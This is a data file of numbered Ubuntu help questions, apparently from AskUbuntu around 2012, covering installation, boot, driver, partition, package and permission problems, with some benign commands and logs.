147059	launching a program from bash causes bash to go to new prompt	when i run a program from the console , e.g . me @ box : ~ $ firefox i expect the console to log error messages ( i think this is std out or std err ? ) and other items from the program , firefox in this case . but today i notice that bash just opens the program and goes to a new prompt , e.g . me @ box : ~ $ firefox me @ box : ~ $ how do i launch a program from bash such that error messages will be written to the console ? why is it that some programs operate this way by default and others ( firefox ) do not ?
147061	how do i make the policykit authentication agent window not dissapear when i enter faulty password in gnome-shell ubuntu 12.04 ?	in unity , whenever authentication is required and when the policykit authentication agent window is presented , it stays there even after i would enter a faulty password . but under gnome shell , whenever i make a mistake , the window is closed immediately . i find this behaviour irritating . for instance i use synaptic rather frequently , and i prefer to start it using synapse . i press ctrl+space to invoke synapse , then i enter `` syn '' ( s-shows smplayer , sy- shows system monitor ) and than i press enter so that synaptic is invoked . then i 'm presented with the policykit authentication agent window . as my password is rather complicated - using special characters and big letters , it 's easy to make a mistake . if i do make a mistake while typing my password , i 'm forced to redo all the previous steps . it 's annoying as hell , knowing that this is not the way the policykit authentication agent window behaves in unity .
147062	change hotkey volume indicator	im using ubuntu 12.04 with gnome shell everything is fine , but i find a bit ugly the image used when i change the sound via fn keys : http : //s15.postimage.org/xn01s5vsb/icon.png is there any way to modify this image or any gnome-shell extension that changes it ?
147066	how can i change an atheros wireless nic region ( regulatory domain ) in ubuntu ?	there is a config_ath_user_regd variable in openwrt that allows the user to override the default settings of the wireless nic . unfortunately grepping the arch kernel config does n't seem to have that , and since openwrt has its fair share of hacking and patches , i do n't know if that 's something they added or that 's provided e.g . in compat-wireless . does this setting exists for ubuntu or backtrack-linux ? update i do n't think crda will do any good to it . [ 10661.269580 ] cfg80211 : restoring regulatory settings while preserving user preference for : bo [ 10661.269589 ] cfg80211 : calling crda to update world regulatory domain [ 10661.276975 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 10661.276982 ] cfg80211 : world regulatory domain updated : [ 10661.276986 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 10661.276992 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10661.276998 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 10661.277003 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 10661.277008 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10661.277014 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10661.277036 ] cfg80211 : calling crda for country : bo [ 10661.285251 ] cfg80211 : ignoring regulatory request set by user since the driver requires its own regulatory domain to be set first [ 10661.285258 ] cfg80211 : regulatory domain changed to country : bo [ 10661.285262 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 10661.285268 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 3000 mbm ) [ 10661.285273 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( n/a , 3000 mbm ) reading further at http : //wireless.kernel.org/en/users/drivers/ath atheros devices share the same regulatory implementation . all devices have a regulatory domain code programmed into their eeprom . the programmed regulatory domain code can be of three kinds : custom world regulatory domains programmed iso-3166-1-numeric country code ( with a few exemptions ) a regulatory pair group number
147068	installed program again in the `` available to install '' list	i have installed mysql server and client from ubuntu software centre . when i search for them from the dash home , they are listed under `` apps available for download '' section . ( if i search and find them in the software centre , i can see the `` installed on ... '' message )
147069	xerox phaser 3160n installation on 12.04 machine	i have recently had windows xp die on one of my machines , and have installed ubuntu . the os works great , except for installing the xerox phaser 3160n printer . the os can find and install the network printer , but when i print a test page , it tells me internal error – please use the correct driver . i have the correct drivers , as your support team have sent me the link but i can not install these drivers to run the printer . these are the instructions from the on-line guide for installing on a linux machine : make sure that the machine is connected to your network and powered on . also , your machine’s ip address should have been set . insert the supplied software cd into your cd-rom drive . double-click cd-rom icon that appears on your linux desktop . double-click the linux folder . double-click the install.sh icon . the xerox installer window opens . click continue . the add printer wizard window opens . click next . select network printer and click search button . the printer’s ip address and model name appears on list field . select your machine and click next . i get as far as step 5 , and step 6 never happens , if it did , it would be very easy from there . there are options to add additional software to ubuntu , however it does not recognize the installation cd as valid when i try to add it as a source . any ideas on how to fix this ?
147076	while upgrading ubuntu 11.10 to 12.04 , it got struct . only prompt is showing	while upgrading ubuntu 11.10 to 12.04 , it got struct . only prompt is showing.i am not able to login . please help me to come out of this .
147077	mysql workbench for ubuntu 12.04 lts	mysql workbench is not available for 12.04 , it is at the moment available upto 11.04 only . i tried to install the workbench 11.04 version on my ubuntu 12.04 , but no success . ( i just opened the deb package using software centre , but the following error messages displayed )
147080	shell script to toggle between two commands	i need help creating a shell script to toggle between two commands . when it is run command1 is executed then if it is run again it executes command2 and so on ...
147082	fix xbmc cpu usage ?	i am trying to use xbmc to play a blu ray . it worked fine yesterday but today it makes my computer freeze . i think it is cpu related so thought id try this : http : //thepcspy.com/read/how-fix-idle-100-cpu-issue-xbmc/ i 'm not seeing advancedsettings.xml however . do you have any suggestions on how to get blu ray playback working in ubuntu ?
147085	mp3 to ogg converter plugin for rhythmbox or banshee ?	i like to convert all mp3 , aac , wav files into ogg format . is there any plugins for rhythmbox or banshee that converts mp3 format into ogg formate automatically like itunes converts wma format into mp3 . p.s all blackberries and android phones supports ogg format .
147094	what power settings can i use for asus u32u-es21 to achieve something close to the stated 10 hours battery life ?	so when i got my asus x32u notebook , the first thing i did was delete windows and install 64bit ubuntu 12.04 - which works great , however i only get around 2.5 hours on battery - nothing close to the advertised 10 hours . what settings or configurations can i use/adjust to improve this ?
147098	redirected to ubuntu downloads page when clicking the wubi download button	aloha . when i try to download wubi and hit download now , it wont download . it just redirects me to the page before , the ubuntu downloads page , is this an error on the site , or a bug on my comp ? thanks
147104	how to save downloaded software ?	i am totally new to ubuntu and my internet connection is slow . because of that , i ca n't afford to download software twice . when i install ubuntu again for some reason , i want to know how to save the downloaded software so i can install it again . i do n't understand how to install software as well . if someone can suggest me software for video and audio codec , download accelerator , that would be useful .
147105	how can i reassign the semi-maximize keyboard shortcut ?	in ubuntu 12.04 , ctrl+super+ ( left|right ) `` semi-maximizes '' the window , which docks it to the left or right half of the screen . how do i reassign this function to use just the super key instead of super+ctrl ?
147112	ssh remote user need to be logged in ?	i 'm trying to set up an ssh server . i put my public key in the authorized_keys file , made sure the permissions were correct , etc . when i restart the server ( really just ubuntu 12.04 desktop ) and i ssh to it without first logging in on the server , i am asked for a password . if , however , i log into the server , i can ssh without being asked for a password . auth.log has these lines when i have not logged in on the actual server : mordor sshd [ 1605 ] : debug1 : trying public key file /home/buck/.ssh/authorized_keys mordor sshd [ 1605 ] : debug1 : could not open authorized keys '/home/buck/.ssh/authorized_keys ' : no such file or directory
147116	need to know about bootloader & reinstalltion	question 1 : recently i have installed ubuntu 12.04lts in one of my ntfs partition ( converting it into ext4 jfs during ubuntu installation ) . now grub2 has became my default boot manager . using easy bcd software i have changed my bootloader ( grub ) to windows boot manager . now if i want to remove ubuntu & if i delete that partitions ( my partitions : root , swap , home ) using windows disk management , that holds ubuntu , then is there any possibilities to fail my pc to boot ? if i format the free space ( after deleting partitions that i get ) to ntfs again , is it will work smoothly with my windows 7 ? question 2 : if i want to reinstall ubuntu then what i have to do ? if i just show the mount points of my previous root , swap , home & format them & mount them as root , swap , home during new installation , is it the right process to reinstall ? ? ? please help ... ... ... ... ...
147120	how do i enable trim on an ssd in a wubi install under windows 7 ?	i 've installed wubi on an ssd on a windows 7 x64 system . wubi and windows 7 reside on the same ntfs formated drive/partition . how does trim work for this configuration ? how do i configure it ? everything i 've seen refer to a direct install of ubuntu on an ext4 formated drive etc .
147121	why is lubuntu 12.04 so slow to start up and shut down on my mac powerbook g4 ?	i just installed lubuntu 12.04 on a mac powerbook g4 12 inch laptop ( g4 867 mhz powerbook with 640 megs ram and an 80 gig hd ) . it works , but just barely , with a painfully slow shutdown ( about 3 minutes ) and an equally painful boot up ( 5 minutes ) . once it boots , applications are reasonably responsive . any ideas or suggestions ?
147125	how do i activate full screen mode when using skype ?	i 'm using the version of skype from the ubuntu software centre ( skype 2.2.0.35-0precise3 ) but i ca n't for the life of me see how to make a video call full screen . all i have is a small window , dragging to the edges of the screen does n't 'aero-snap ' it larger . am i missing something really obvious , i ca n't see any full screen button , or work out a keyboard shortcut . is it even possible to have a full screen video call ?
147128	change default tty shortcut	i would like to change the default shortcut to switch back and forth to the tty . by default it is ctrl + alt + f # . i have tried making a custom shortcut using ubuntu 's keyboard settings but it only worked while using the graphical interface when i switch back to tty it does n't work . so i need to figure out how to change the default binding of the ctrl + alt + f # shortcut to make a single key toggle back and forth between two ttys .
147132	move ext4 partition	i have an ext4 partition at the end of an hard drive , and want to resize it to the full disk size ( the rest of the disk is empty ) . it 's not the root partition , just a data partition , so it 's no problem to unmount the partition . the machine has ubuntu server running , and neither screen , keyboard , mouse nor optical disk drive attached , so booting a live environment to use this approach would be a bit of a hassle and i 'd like to avoid that . anybody know an easy way to do this ? for me , this proves to be a far more difficult task than i had anticipated , but let me elaborate : of course the disks partitions were all unmounted during the following operations . i first tried via parted : i deleted the first partition which was not needed anymore , then wanted to resize or move the ext4 partition . but parted told me it was n't able to do so , because of some filesystem features of ext4 ( with a weird error message : `` error : file system has an incompatible feature enabled . compatible features are has_journal , dir_index , filetype , sparse_super and large_file . use tune2fs or debugfs to remove features . '' - so what are the incompatible features ? ) ; what i got from that , and as an answer on comments in another question , it is somehow not possible for parted to change the start of an ext4 partition . why can gparted , however , seemingly do the trick ( see first linked question ) but not parted ? well , since i had enough space at the start of the drive left ( more than the size of the partition to move ) i thought i 'd try another approach : create a second partition at the front , copy the contents from the one at the back to this one , then delete the old partition and resize the new to the full size . however , this also proved impossible : after creating the partition and copying the contents ( via dd if=/dev/sdb2 of=/dev/sdb1 ) , the partition ca n't be mounted ( 'missing journal superblock ' ) . so at the moment i 'm fresh out of ideas . i 'll probably copy everything vital to another disk , delete all partitions again and create one big one . i 'm wondering that this is such a problem - or am i overlooking the obvious ?
147135	how can i uninstall mongodb and reinstall the latest version ?	i need to uninstall mongodb completely from my system ( ubuntu 11.10 ) and install version 2.0.5 . currently , when i run : mongo db i get the following error : mongodb shell version : 2.0.1 connecting to : db wed jun 6 13:05:03 error : could n't connect to server 127.0.0.1 shell/mongo.js:84 exception : connect failed
147136	can not install gnu fortran compiler due to unresolved dependencies	i have a fresh ubuntu 12.04 install . i have updated it without any problem , but when i tried to install the fortran gnu compiler from software center i get the error package dependencies can not be resolved . what is the problem ? i am working behind a proxy .
147138	drivers for a intel desktop board d865gsa	i have ubuntu 12.04 installed in my desktop . there is no other operating system installed . do i need to install my motherboard drivers too ( lan driver , audio driver , graphics driver ) ? if yes then where i can get these drivers for `` intel desktop board d865gsa '' that can be installed in ubuntu 12.04 , as the installation files that i am having are in .exe format which i am unable to install in ubuntu .
147140	ubuntu 12.04 mdadm inactive	for a while now , my raid 5 has ceased to work . everytime i tried `` madm -- detail /dev/md127 '' , its states all the drive and drive info , but that two of the drives have been removed . after some restarts , doing the same thing , i am getting /dev/md127 does not appear to be active . when i go into diskutil , i can see all 6 hard drives healthy and present , and i can see the raid 5 at the bottom under multi-disk devices . however , the raid says 0.0kb , and is not active . please help and let me know how to proceed from here . i would really like to avoid rebuilding the raid , especially because all 6 drives seem to be healthy and present . thanks so much .
147142	how can i recover bookmarks in firefox	i have firefox on ubuntu 10.10 . i added another profile to firefox in the last two weeks . firefox gave me the option to choose between the different profiles , but now it will not login automatically . so how can i restore bookmarks or the other profile for firefox . any suggestion will be appreciated .
147152	home directory messed up	recently , i installed ubuntu 12.04 . for some reason , i backed-up my home directory contents to another directory ( say bkp dir ) . precisely , i moved documents , pictures , downloads , etc.. to bkp directory . now , deleted all my original home directory contents . i restored all the bkp directory content back to home . i find them all on my desktop . i believe some kinda chain is broken . i dont find respective home directories icons on them . how do i restore it ? also , i dont find them in my places options . messed up image link thanks ... ls -lh ~ ~/desktop nuthan @ nuthan-desktop : ~ $ ls -lh ~ ~/desktop /home/nuthan : total 2.8m drwxr-x -- - 11 nuthan nuthan 4.0k may 28 20:05 android-sdk-linux drwxrwxr-x 4 nuthan nuthan 4.0k may 25 13:36 android-sdks drwxrwxr-x 2 nuthan nuthan 4.0k may 18 17:30 convert -rw-rw-r -- 1 nuthan nuthan 0 may 30 09:07 dependancies~ drwxr-xr-x 2 nuthan nuthan 4.0k jun 6 14:16 desktop drwxrwxrwx 6 nuthan nuthan 4.0k jun 6 12:06 documents drwxr-xr-x 28 nuthan nuthan 12k jun 6 13:52 downloads drwxrwxr-x 2 nuthan nuthan 4.0k mar 6 13:23 examples -rw-r -- r -- 1 nuthan nuthan 8.3k may 11 16:19 examples.desktop drwxrwxr-x 4 nuthan nuthan 4.0k may 18 19:04 github -rw-rw-r -- 1 nuthan nuthan 0 may 28 18:40 linux~ drwxr-xr-x 2 nuthan nuthan 4.0k may 11 16:46 music drwxrwxr-x 2 nuthan nuthan 4.0k may 30 08:48 node-code drwxrwxr-x 4 nuthan nuthan 4.0k may 30 08:40 node_modules drwxr-xr-x 7 nuthan nuthan 4.0k may 25 13:55 noduino drwxrwxr-x 2 nuthan nuthan 4.0k may 30 11:58 nuthan drwxrwxrwx 3 nuthan nuthan 4.0k may 24 11:13 pictures drwxrwxr-x 6 nuthan nuthan 4.0k mar 6 13:23 public drwxr-xr-x 2 nuthan nuthan 4.0k may 25 11:44 public drwxrwxr-x 2 nuthan nuthan 4.0k may 29 18:50 python -rw-rw-r -- 1 nuthan nuthan 983k jun 6 14:16 screenshot from 2012-06-06 14:16:37.png -rw-rw-r -- 1 nuthan nuthan 980k jun 6 14:20 screenshot from 2012-06-06 14:20:24.png -rw-rw-r -- 1 nuthan nuthan 731k jun 6 14:22 screenshot from 2012-06-06 14:22:06.png drwxrwxr-x 3 nuthan nuthan 4.0k may 31 18:17 sketchbook drwxrwxr-x 2 nuthan nuthan 4.0k jun 6 13:05 sql -rw-rw-r -- 1 nuthan nuthan 201 may 28 22:08 sql~ drwxr-xr-x 2 nuthan nuthan 4.0k may 11 16:46 templates -rw-rw-r -- 1 nuthan nuthan 5.1k jun 4 12:29 test~ drwxrwxr-x 3 nuthan nuthan 4.0k may 14 11:09 titanium_studio drwxrwxr-x 4 nuthan nuthan 4.0k may 14 21:00 titanium studio workspace drwxrwxr-x 4 nuthan nuthan 4.0k jun 1 18:29 tpm_trak drwxrwxr-x 2 nuthan nuthan 4.0k may 24 17:30 ubuntu one drwxr-xr-x 2 nuthan nuthan 4.0k may 11 16:46 videos drwxrwxr-x 6 nuthan nuthan 4.0k may 31 15:10 workspace drwxrwxr-x 3 nuthan nuthan 4.0k may 14 11:57 zend /home/nuthan/desktop : total 20k -rw-rw-r -- 1 nuthan nuthan 441 may 30 09:07 dependancies -rw-rw-r -- 1 nuthan nuthan 1.6k may 28 18:40 linux -rw-rw-r -- 1 nuthan nuthan 470 may 28 22:16 sql -rw-rw-r -- 1 nuthan nuthan 5.1k jun 4 19:34 test nuthan @ nuthan-desktop : ~ $
147154	how to identify what capture card is installed	yo ! how to find out what capture card im currently using ? i 'm using ubuntu as an operating system . thanks . : )
147156	dpkg reports error on package icaclient	i installed the icaclient ( it 's a client for citrix ) a while back . i do n't exactly remember what i did to get it working but it was enervating . i had to install some old packages not even avaiable for ubuntu ( 12.04 ) and in the end i used some stuff from old rpms . anyway the client is more or less working now but i always get a dpkg error when installing or updating something . the ( translated ) error message is something like : dpkg : error while processing icaclient : i386 ( -- configure ) : subprocess installed post-installation-script return errorcode 2 i just want to tell dpkg to ignore this or remove this post-install-script but i do n't know how . thanks !
147163	how do i allow ubuntu to use more space on my computer ?	ubuntu currently wo n't use more than 4gibs on my computer , but i need more space . my computer can hold much more than 4gibs . how do i allow ubuntu to use more ? please give step-by-step instructions in plain english . update : i 'm referring to my ubuntu operating system . i installed it using wubi through microsoft windows . i deleted wubi from my windows desktop after installation . all i want is to expand my ubuntu operating system . i plan to gradually transition from windows to ubuntu and so i 'll need to transfer more files and programs from windows to ubuntu in the future . right now , i already need more gibs for ubuntu . i can barely use ubuntu right now because there 's almost no space left . i simply want ubuntu to use what space i need it to use . people , please quit complicating this issue and inform me how to make ubuntu use more space .
147164	which side indicates the ubuntu partition in automatic partition resizing window in installation	i am trying to install ubuntu 12.04 alongside windows 7 . i get to the `` automatic partition resizing slider '' window , and i see two partitions that i can resize by dragging . however , i am bit confused , will ubuntu be installed on the left side or the right side ? i need this because , i want to allocate a certain amount of disk space to the ubuntu partition , but i have no idea which side , left or right , is the ubuntu partition . there is no label . i am following the installation instructions here . there is not help in the instructions either . the installation instruction says `` specify the size of the new partition by dragging the slider at the bottom of the window '' , without providing any hints about which will be the ubuntu partition . i 've looked all over but can not find an answer to this question .
147166	how to show all windows of one application again when i click its icon in the launcher ?	it is the original function for 12.04 , but it does not work in my computer , maybe as i use the compiz config settings manager , so there are some conflicts . what can i do to fix it ? there are too many parameters in the ccsm , wish you help . what i mean :
147167	12.04 freezes on install	i 'm new to ubuntu and ca n't for the life of me understand how to get around this issue . i 'm having a problem where when i insert the boot disk that i burned for 12.04 , it loads and gives me the language option and select an installation type , i select either try ubuntu / install ubuntu and it begins to load . then after about 5 mintues of the purple screen with the dots under the ubuntu it freezes the whole computer , and the only way to get out is to turn off the laptop with the power button . i have read previous threads saying people had similar `` freezing '' issues including ones that mention my model of laptop , hp pavillion dv1000 . but it appears their problems are post installation and relate to their wireless cards . i have tried changing the boot options ( f6 ) and i am totally stuck . can anyone shed any light on to this issue ? thanks in advance ... ... ...
147168	bluetooth no longer working ?	i am using a toshiba portege a600 and have been using ubuntu for about a year now . when i first installed ubuntu `` 10.10 '' , everything worked fine , including bluetooth . i was able to send and receive files . after upgrading to 11.04 and then to 11.10 , bluetooth functionality decreased . i was able to view bluetooth devices , but not be able to pair or connect to them . now , on 12.04 , bluetooth is no longer recognised at all . when i open up the bluetooth settings application , it says `` no bluetooth adapters found '' . what is the cause of this , and how can i fix it . i have included the output of sudo lshw . http : //pastebin.com/09w0vkfu thanks !
147176	is it possible to install libreoffice from ubuntu dvd to ubuntu studio ?	because of download restriction , i would like to know if it is possible to install libreoffice ( or other software ) from ubuntu 12.04 dvd to ubuntu studio ? i have ubuntu studio 12.04 installed and have ubuntu 12.04 dvd .
147178	e : the package needs to be reinstalled , but i ca n't find an archive for it	i keep getting this error message when i try to use the update manager : e : the package thunderbird needs to be reinstalled , but i ca n't find an archive for it . this error has bugged my computer making it slower and does not allow me to use the ubuntu software center .
147182	sharp ar5316e driver ?	does everyone knows , how to get driver for sharp ar5316e for ubuntu 12.04 . i have tried downloading for ar-161 ppd file also , but it also does not works . my presumption , can i install through wine with driver downloaded for xp version.. will this work ... ? also how could i use it for network enabled printing , as this is also a network printer . assad
147184	12.04 x64 server login failure	after some serious grub issues after routine kernel updates , forcing a grub-reinstall via chroot and some single-user mode maintenance , i now can not login to my server ( except via single-user mode ) when attempting to ssh to the server my connection is reset immediately after entering username - no password prompt is presented . i 've plugged in my monitor and keyboard to the headless server and when trying to login i received this message immediately after entering my username : login : `` pam failure , aborting : critical error - immediate abort '' again , no password prompt is displayed . i am able to gain access via kernel recovery mode and login as root through single-user mode with networking . i 've attempted a dpkg reconfigure believing i may have had some incomplete/borked packages , but to no avail . looking through /etc/pam.d/login does n't seem to lead me in any obvious directions and i 'm afraid i 'm out of ideas . googling does n't help me much , one guy reinstalled ( really do n't want to do this ) and the rest i could find were old gentoo related bugs . any tips ?
147187	when typing , mouse pointer stops moving	i have done a typical installation of ubuntu 12.04 precise , but i seem to have a small issue . when i type anything in the keyboard or when i 'm playing a game that requires two hands ( e.g . nexuiz ) the mouse does n't respond . so , for example in nexuiz , when i am moving i ca n't turn around at all . is there any way to fix this ? thanks in advance !
147193	can no longer boot from hd after installation of latest 12.04 update	the following message was seen at upgrade process ( during installation of grub-efi-amd64 ) : `` fatal : couldnt open either sysfs or procfs directories for acessing efi variables . try 'modprobe efivars ' as root '' . obviously there is no longer a bootable grub on my hd . before that upgrade everything went fine on my thinkpad edge 13 '' e325 with 12.04 64-bit .
147196	graphic crash after ubuntu 12.04 minor update	my problem came after doing a normal packages update in 12.04 and then reboot to never been able to boot normally , it appear the `` the system is running in low-graphics mode '' window and then i tried to fix the problem reinstalling the gmd . now i 'm reinstalling the whole system , from the usb boot it went everything as usual before that update . i just want to never have to reinstall ubuntu in this way again . any thoughts ? i 'm using ubuntu 12.04 lts on an acer aspire one d255
147202	installation never finishes on an old dell latitude c400	i am trying to install ubuntu 12.04 on an old dell latitude c400 laptop previously running windows xp using an ubuntu install cd . the os runs fine off the cd if a bit slow , and the installation starts off fine . however once the progress bar is filled i get put back to the desktop and nothing happens , first i assumed that the installation was completed but when i restarted the computer and booted from the hard drive nothing happened . i tried to install a few more times but the same thing happens . am i doing something wrong ? i do not get a error message or a installation complete notification . is there any way i could get some kind of debug screen or log to see if something went wrong or at least follow the installation progress in more detail .
147203	how can i get ubuntu 12.04 to boot on a gigabyte 990fx mb ( efi problem ? )	i am trying to install ubuntu 12.04 on a home made system with a gigabyte 990fxa mb . i can make it through the install process . it does not boot . windows 7 does boot on the same machine . suse 11.4 boots on the same machine . suse 12.4 does not boot . i think there may be an issue with the efi / gpt system . i know very little about these systems . i really expected the machine to boot . what can i do to get the system to boot ? please direct me to a path to trouble shoot this problem . thanks jeffrey
147205	subversion & svn+ssh permissions	i want to set up some subversion repositories , to be accessed via svn+ssh , so that each repository is owned by a different group and is only accessible for reading and writing by the group 's members . this is what i did so far : sudo addgroup myproject sudo mkdir -p /svn/myproject sudo svnadmin create /svn/myproject sudo chown -r : myproject /svn/myproject sudo chmod -r g+rws /svn/myproject however , something with my setup is not working properly ... even though userone is not a member of the myproject group , userone can checkout the whole repository . ( is this because userone is member of the sudo group ? ) usertwo is a member of the myproject group , but can not commit to the repository due to an error : permission denied while accessing /svn/myproject/db/revprops/__something__/__something__ point 1 ) is an issue because it may mean everyone with shell access to the machine can checkout the code . point 2 ) is problematic because a user with ( apparently ) the right permissions ca n't commit to the repository . what am i doing wrong in this setup ?
147206	how to re install ubuntu on the fedora partition	i have a windows 7 partition of 200 gb . i have currently installed fedora 16 on the remaining 30 gb partition and now want to install ubuntu 12.04 on the 30 gb partition . help me how to do so . also write to me detailed installation process of ubuntu 12.04 . please provide pictures or videos if possible for the detailed installation
147207	how can i enable one-finger scrolling in unity ?	i would like to activate to scroll with one finger inside the unity environment ( nautilus , dash , firefox ) . because unity claims to be touch screen friendly but scrolling with two fingers is annoying and does n't work so well .
147218	putting pictures onto an ipod touch ( 2nd gen )	how do i sync pictures from my ubuntu 12.04 laptop onto my ipod touch easily ? can someone give me some clear steps without the use of the terminal each time ?
147223	why do i get a `failed to symbolic-link /boot/initrd.img ' error when updating ?	i tried to update the ubuntu but i 'm receiving the follow error : setting up linux-image-3.2.0-24-generic ( 3.2.0-24.39 ) ... running depmod . failed to symbolic-link /boot/initrd.img-3.2.0-24-generic to initrd.img : file exists dpkg : error processing linux-image-3.2.0-24-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 setting up firefox ( 13.0+build1-0ubuntu0.12.04.1 ) ... installing new version of config file /etc/apparmor.d/usr.bin.firefox ... please restart all running instances of firefox , or you will experience problems . setting up firefox-globalmenu ( 13.0+build1-0ubuntu0.12.04.1 ) ... setting up firefox-gnome-support ( 13.0+build1-0ubuntu0.12.04.1 ) ... setting up firefox-locale-en ( 13.0+build1-0ubuntu0.12.04.1 ) ... errors were encountered while processing : linux-image-3.2.0-24-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what can i do ?
147225	how to set ms word 2010 as default application for all docx and other types ?	i have installed ms office 2010 on ubuntu 12.04 using playonlinux . now to open a .docx file i have to first open word and then use open to open the file i want . when i double click on the file it opens with libreoffice instead . so how can i set word as the default application ? word also does n't show up in the application list .
147228	how to repair a corrupted fat32 file system	i 'm using the fat32 file system for my pen drive . it 's frequently facing file/data corruptions . in windows , i used the scan disk utility to fix the fat32/ntfs file systems . how can i do this in ubuntu ?
147234	how to do a one way synchronization between folders ?	i want to do one way synchronization . i am having folder a on my computer which is constantly updated with content . another folder b is used for backup purpose which is on external hdd . now what i expect is that whatever extra which is present in folder a should go to folder b . however something which is present in b and not in a `` '' shall not be copied to a '' '' . in a nutshell , the backup folder may copy everything from the source folder , however nothing should be copied form backup folder to the source .
147241	execute sudo without password ?	inspired by this question ... . i am the sole person using my system with 12.04 . every time i issue a sudo command ; the system asks for the user password ( which is good in its own way ) . however i was thinking ; without activating the root account ; how can i execute the sudo commands which will not ask for user password to authenticate . note : i want to execute sudo command without authenticating via password ; only when they are executed via terminal . i do n't want to remove this extra layer of security from other functions such a while using 'ubuntu software center ' or executing a bash script by drag-drop something.sh file to the terminal .
147242	upgrading process terminated ! how to fix it ?	i yesterday started upgrade from ubuntu 11.10 to ubuntu 12.04 and i terminated it just when it was installing packages ( do n't ask me why ) . today when i tried to repeat procedure when i turned on update manager it pop out a warning box which says `` not all upgrades can be installed '' and has some buttons on it . one of those is `` partial upgrade '' , and when i click it it starts some window which says `` can not upgrade , an upgrade from 'precise ' do 'oneiric ' is not supported with this tool '' ( before that it asks me for my password ) . how can i now upgrade to ubuntu 12.04 without reinstalling entire ubuntu ?
147247	wired connection problem	i 've recently been updating from lynx and am currently at 11.10 however when i restarted the computer i could n't get any wired connection ( which is what i use ) . when i click at the top it just says that the connection is disconnected , which it is n't ... i 'm a bit of a newbie at ubuntu so i may have missed something obvious but if any of you guys could help that would be great ! : d edit : my ifconfig result is link evaluate : local loopback inet addr:127.0.0.1 scope : host up loopback running mtu :16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes ( 0.0 b ) i 've checked the cable and that is definately working . i also get usage : dmesg [ -c ] [ -n level ] [ -r ] [ -s bufsize ]
147255	set for boot without password still while installing it asks for password . how to reset or recover the password ?	i have only ubuntu 12.04 lts installed on my system . i set logon password as `` boot without password '' and removed the password . still while installing anything it asks for password which i lost . can anyone help ?
147258	winrar installation on ubuntu	any one please tell me how can i install winrar on my ubuntu 10.04 i use sudo apt-get install rar anybody help me ?
147263	swappiness issues	i just got an old laptop , and i am using it to run a minecraft server , just for the fun , but the problem is it only has got 2gbs of ram , i made a 20gb swap section , set swappiness to 100 , but i still get my ram stuffed , and when i tested it with an heavy load , my ram still got filled and the laptop froze up , cant i say to a program or something to use swap only ? or atleast say it should use no more that x ammount of ram ? thanks in advance sys ubuntu 11.10 2ghz dual core 2gb ram
147268	installation problems	i have a medion desktop 32-bit pc running on windows vista built in . windows will not let me install ubuntu 11.10 from disk or installer . i keep getting an error message saying that i need to insert the boot disk into a hard disk ( when the cd is already in the dvd-rom drive ) ? i have managed to bypass this error message but i can not get wubi to install ubuntu as an application in windows either . the installation crashes near the end with a message saying that there is an error log message i ca n't get at . to complicate matters windows vista is missing part of its dll and chkpsk files ( no idea why ) . i do n't know if this is relevant but it may have something to do with it . i can get a very slow ubuntu 11.10 live demo going from turning pc on with cd in dvd-rom drive , but i am a bit reluctant to set up a dual boot from the live demo as i am not sure that i would be able to completely uninstall ubuntu ( removing hard drive partitions ) if i have to in future .
147272	problem with executing udev rules for olimex 's avr-usb-jtag	i 'm using ubuntu 12.04 for programming purposes and recently decided to bring my previous atmel 's micro-controller projects from win to linux . namely avr . i installed the tool chain all right . it includes : avrdude binutils-avr gcc-avr avr-libc gdb-avr . to test my connection to the micro-controller i used an olimex avr-usb-jtag programmer . when i plug it in and it is seen as /dev/ttyusb0 ( being an ftdi usb-com chip ) . the programmer is atmel jtagice compatible . now when we try to avrdude -p c128 -c jtag1 -p /dev/ttyusb0 -t and we get avrdude : ser_open ( ) : ca n't open device `` /dev/ttyusb0 '' : permission denied so far it seems that without root 's permissions we ca n't write nor read from the device . and it proves to be true when we actually try sudo avrdude -p c128 -c jtag1 -p /dev/ttyusb0 -t the response is : avrdude : avr device initialized and ready to accept instructions reading | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # | 100 % 0.01s avrdude : device signature = 0x1e9781 now i want to enable usual users ( like programming ide 's for example ) to access the programmer without giving them root permissions . the first question for me is how to do that better ? i tried the udev approach and wanted the system to distinguish the plugged in device and apply permissions to the device file ( ttyusb0 by default for me ) . but the only option that worked was making a new file : /etc/udev/rules.d/10-usb-avr-jtag.rules it contained kernel== '' ttyusb* '' mode= '' 0666 '' this configuration works , but i 'm curious why something like this below does n't work for me at all ( the default ttyusb0 is appearing , no rules are applied to the file ) ? : subsystem== '' usb '' , attr { idproduct } == '' 6001 '' , attr { idvendor } == '' 0403 '' , mode= '' 0666 '' any ideas on how to make it work , or why it does n't work at all ? here 's my output udevadm
147277	sudo apt-get remove does not remove config files	i 'm new to linux/ubuntu - and i 'm wondering if the behaviour i 'm seeing is as designed . i have installed vsftpd : sudo apt-get install vsftpd then i remove : sudo apt-get remove vsftpd however , looking in /etc i can see that vsftpd.conf is still present . can someone explain why this is happening ( i am assuming the remove would remove all files relating to vsftpd ) ?
